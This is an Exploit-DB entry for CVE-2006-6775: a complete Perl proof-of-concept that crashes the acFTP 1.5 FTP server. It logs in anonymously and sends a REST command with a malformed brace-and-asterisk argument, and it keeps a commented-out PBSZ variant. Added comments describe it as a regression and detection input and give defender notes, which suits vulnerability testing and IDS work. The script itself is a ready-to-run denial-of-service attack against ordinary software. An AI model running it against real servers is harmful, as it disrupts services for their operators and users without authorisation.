acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service
Author: gbr
type: dos
platform: windows
port:
date_added: 2006-12-22
date_updated: 2011-04-27
verified: 1
codes: OSVDB-32446;CVE-2006-6775
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comacFTP-1.5.zip
#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service #
# author: gbr #
# mail: gabrielquadros[at]hotmail.com #
#################################################
use IO::Socket;
# Proof-of-concept for the acFTP 1.5 REST/PBSZ denial of service catalogued in
# the record above (CVE-2006-6775, OSVDB-32446). The script opens one TCP
# connection, logs in as "anonymous", and sends a single REST command whose
# argument is a 40-character run of brace/asterisk characters. It serves as a
# regression input when validating a fixed build or a detection rule.
#
# Defender notes:
#   - REST normally carries a numeric restart offset and PBSZ a decimal buffer
#     size, so a REST/PBSZ argument made of "{", "}" and "*" is anomalous and
#     can be rejected or alerted on at an FTP-aware proxy or IDS.
#   - The command is sent after an anonymous login here; whether the flaw is
#     reachable before authentication is not shown on this page -- confirm
#     before treating "anonymous access disabled" as a full mitigation.

# Only the first argument (ip) is checked. A missing port leaves $ARGV[1]
# undefined and it is passed to the socket constructor as-is.
if(!defined($ARGV[0])) {
print "Usage: $0 ip port\n";
exit;
}
# Connect to the target given on the command line; abort with the OS error
# text if the TCP connection cannot be established.
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp')
or die "Could not open a socket: $!\n";
# Each recv() reads up to 1024 bytes of server reply into $buf (an undeclared
# package global). The replies are never inspected, so the script continues
# even if the greeting or the login is refused.
$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
# Build the command argument: the 4-character unit "{}*{" repeated 10 times.
# NOTE(review): these look like pattern/wildcard metacharacters; the page does
# not explain the root cause in the server -- confirm against the advisory.
for($i=0; $i<10; $i++) {
$data .= "{}*{";
}
# Send the malformed REST command; this is the only trigger the script fires.
$sock->send("REST $data\r\n");
# Alternate trigger named in the title, left disabled by the author: the same
# argument sent with PBSZ instead of REST.
# $sock->send("PBSZ $data\r\n");
# Printed unconditionally: the script never checks that the service stopped
# responding, so this message alone is not evidence that a host is vulnerable.
# Verify the service state separately when testing a patch.
print "Server exploited\n";
# milw0rm.com [2006-12-23]